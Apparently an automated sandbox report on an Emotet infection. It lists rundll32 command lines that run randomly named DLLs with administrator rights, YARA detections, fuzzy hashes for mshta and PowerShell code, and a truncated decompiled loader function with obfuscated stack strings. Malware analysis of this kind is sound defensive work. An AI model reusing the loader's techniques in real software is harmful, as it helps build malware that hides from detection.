Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2672, Parent PID: 1532

General

Target ID:	12
Start time:	21:30:08
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
Imagebase:	0xc00000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2916, Parent PID: 2672

General

Target ID:	14
Start time:	21:30:27
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
Imagebase:	0xc00000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1200, Parent PID: 2916

General

Target ID:	15
Start time:	21:30:32
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
Imagebase:	0xc00000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2424, Parent PID: 1200

General

Target ID:	16
Start time:	21:30:49
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
Imagebase:	0xc00000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2144, Parent PID: 2424

General

Target ID:	17
Start time:	21:30:57
Start date:	28/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
Imagebase:	0xc00000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: mshta.exePID: 2840, Parent PID: 1760COMMON

Executed Functions

Function 03941CD2 Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423822612.0000000003941000.00000010.00000800.00020000.00000000.sdmp, Offset: 03941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3940000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a94a774c1a945be1bc0bbcd1b519113a47c825de2d072786b7227bf95e207e
Instruction ID: 6af0fa0e1ac2b2e52fbfc339fe032407e2b43fb8a51a990ce68669c4adca084c
Opcode Fuzzy Hash: a2a94a774c1a945be1bc0bbcd1b519113a47c825de2d072786b7227bf95e207e
Instruction Fuzzy Hash: B1D1253061CA884FCB59DB2CD154A25BBE1FB5D344B5948EEE4CECB292DA20CCD1C795

Uniqueness

Uniqueness Score: -1.00%

Function 03941CD2 Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423822612.0000000003941000.00000010.00000800.00020000.00000000.sdmp, Offset: 03940000, based on PE: false

Associated: 00000004.00000003.423778831.0000000003940000.00000010.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3940000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a94a774c1a945be1bc0bbcd1b519113a47c825de2d072786b7227bf95e207e
Instruction ID: 6af0fa0e1ac2b2e52fbfc339fe032407e2b43fb8a51a990ce68669c4adca084c
Opcode Fuzzy Hash: a2a94a774c1a945be1bc0bbcd1b519113a47c825de2d072786b7227bf95e207e
Instruction Fuzzy Hash: B1D1253061CA884FCB59DB2CD154A25BBE1FB5D344B5948EEE4CECB292DA20CCD1C795

Uniqueness

Uniqueness Score: -1.00%

Function 03943128 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423778831.0000000003940000.00000010.00000800.00020000.00000000.sdmp, Offset: 03940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3940000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28f9d9bfb19aa55e4305f4a380252551fac5c6a2718523c09818466f667336c0
Instruction ID: 641c248d34e2cd8b38241c6f7e2a8c107bb12e28c7ddf5c64df4e2e583254f88
Opcode Fuzzy Hash: 28f9d9bfb19aa55e4305f4a380252551fac5c6a2718523c09818466f667336c0
Instruction Fuzzy Hash: 6651E72071CA484FCB48EB2C9499A31F7E1FB5D340B5985EEE44EC73A6DA24CCA1C751

Uniqueness

Uniqueness Score: -1.00%

Function 03943128 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423778831.0000000003940000.00000010.00000800.00020000.00000000.sdmp, Offset: 03943000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3940000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28f9d9bfb19aa55e4305f4a380252551fac5c6a2718523c09818466f667336c0
Instruction ID: 641c248d34e2cd8b38241c6f7e2a8c107bb12e28c7ddf5c64df4e2e583254f88
Opcode Fuzzy Hash: 28f9d9bfb19aa55e4305f4a380252551fac5c6a2718523c09818466f667336c0
Instruction Fuzzy Hash: 6651E72071CA484FCB48EB2C9499A31F7E1FB5D340B5985EEE44EC73A6DA24CCA1C751

Uniqueness

Uniqueness Score: -1.00%

Function 0394331E Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423778831.0000000003940000.00000010.00000800.00020000.00000000.sdmp, Offset: 03940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3940000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5f3e6e200b6ace92c03fdf6f58a5122a5095020badcf62e59cdaf1d3cadfde
Instruction ID: 7bfa9f821c28d34d3d7816f83b8781bf6f4c5d7e66306fae2b1cb686d8ade6e3
Opcode Fuzzy Hash: 8b5f3e6e200b6ace92c03fdf6f58a5122a5095020badcf62e59cdaf1d3cadfde
Instruction Fuzzy Hash: A7D0A921208A840FC60AA3B810154283BA1CA4F28832C44CA88CACB146CD004CA58212

Uniqueness

Uniqueness Score: -1.00%

Function 0394331E Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423778831.0000000003940000.00000010.00000800.00020000.00000000.sdmp, Offset: 03943000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3940000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5f3e6e200b6ace92c03fdf6f58a5122a5095020badcf62e59cdaf1d3cadfde
Instruction ID: 7bfa9f821c28d34d3d7816f83b8781bf6f4c5d7e66306fae2b1cb686d8ade6e3
Opcode Fuzzy Hash: 8b5f3e6e200b6ace92c03fdf6f58a5122a5095020badcf62e59cdaf1d3cadfde
Instruction Fuzzy Hash: A7D0A921208A840FC60AA3B810154283BA1CA4F28832C44CA88CACB146CD004CA58212

Uniqueness

Uniqueness Score: -1.00%

Function 035D0F51 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035D0F49 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035D0F41 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035D0F79 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035D0F71 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035D0F11 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035D0F21 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035D0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035D0F91 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035D0F89 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.423844178.00000000035D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_35d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction ID: 920c6600ce3b4a2dec134c897720249b2d42905cb1f90fc674a4027dedc4bd0d
Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3004, Parent PID: 2840COMMON

Executed Functions

Function 000007FF00270A82 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.690928605.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c7743ef53e31390f84ebbe9c255b3dec5d76fed7aed71034cb69bb430f8cb1
Instruction ID: dce74063c32be87abadb235f7e9a3df67a5ddba1595cc111e7dbb9476ba429c3
Opcode Fuzzy Hash: e7c7743ef53e31390f84ebbe9c255b3dec5d76fed7aed71034cb69bb430f8cb1
Instruction Fuzzy Hash: 12619D20A1EBC68FE753577858666A17FF09F17210F0A05EBD488CB0E3D9589D9AC362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002708A5 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.690928605.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfdfee3cbecb7e6f76cd7ce42966c07b7996ed4c3c708818fb3fc1ebc9a958e5
Instruction ID: 7929dc77aa8146cdc65d9794278e042d7609b25eccbc2931d6d37e5ce6e14084
Opcode Fuzzy Hash: cfdfee3cbecb7e6f76cd7ce42966c07b7996ed4c3c708818fb3fc1ebc9a958e5
Instruction Fuzzy Hash: 72411E2194E7C28FD707877858A96A03FB0AF17220B0E05E7D088CF0E3D5589D9AD762

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 1180, Parent PID: 2852COMMON

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	16.2%
Signature Coverage:	21.9%
Total number of Nodes:	297
Total number of Limit Nodes:	23

Executed Functions

Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				void* _v44;
				void* _v48;
				long _v52;
				void* _v56;
				struct HRSRC__* _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				intOrPtr _v92;
				void* __ebp;
				signed int _t66;
				void* _t70;
				void* _t72;
				struct HRSRC__* _t74;
				void* _t78;
				intOrPtr _t92;
				void* _t93;
				void* _t95;
				intOrPtr _t104;
				signed int _t120;
				void* _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t96 = __ebx;
				_t66 =  *0x100545cc; // 0x503be811
				_v20 = _t66 ^ _t120;
				_v92 = _a8;
				 *0x10055a80 = _a4;
				_t109 = _a8;
				 *0x10055a84 = _a8;
				 *0x10055a88 = _a12;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t70 = E10006A90(__eflags); // executed
				_t131 = _t70;
				if(_t70 != 0) {
					_push(0x10046758);
					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
					_t72 = 0;
				} else {
					 *0x100530b8 = 0;
					 *0x100530bc = 0;
					 *0x100530c0 = 0;
					 *0x100530c8 = 0;
					 *0x100530c4 = 0;
					 *0x100530cc = 0;
					_v60 = 0;
					_v56 = 0;
					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
					_v60 = _t74;
					_v56 = LoadResource(_a4, _v60);
					_v52 = SizeofResource(_a4, _v60);
					_v88 = 0x6b;
					_v86 = 0x65;
					_v84 = 0x72;
					_v82 = 0x6e;
					_v80 = 0x65;
					_v78 = 0x6c;
					_v76 = 0x33;
					_v74 = 0x32;
					_v72 = 0x2e;
					_v70 = 0x64;
					_v68 = 0x6c;
					_v66 = 0x6c;
					_v64 = 0;
					_v40 = 0x6e;
					_v38 = 0x74;
					_v36 = 0x64;
					_v34 = 0x6c;
					_v32 = 0x6c;
					_v30 = 0x2e;
					_v28 = 0x64;
					_v26 = 0x6c;
					_v24 = 0x6c;
					_v22 = 0;
					_t78 = E10006A90(_t131); // executed
					if(_t78 == 0) {
						_t45 =  &_v88; // 0x6b
						_t95 = E100048E0(_t45);
						_t121 = _t121 + 4;
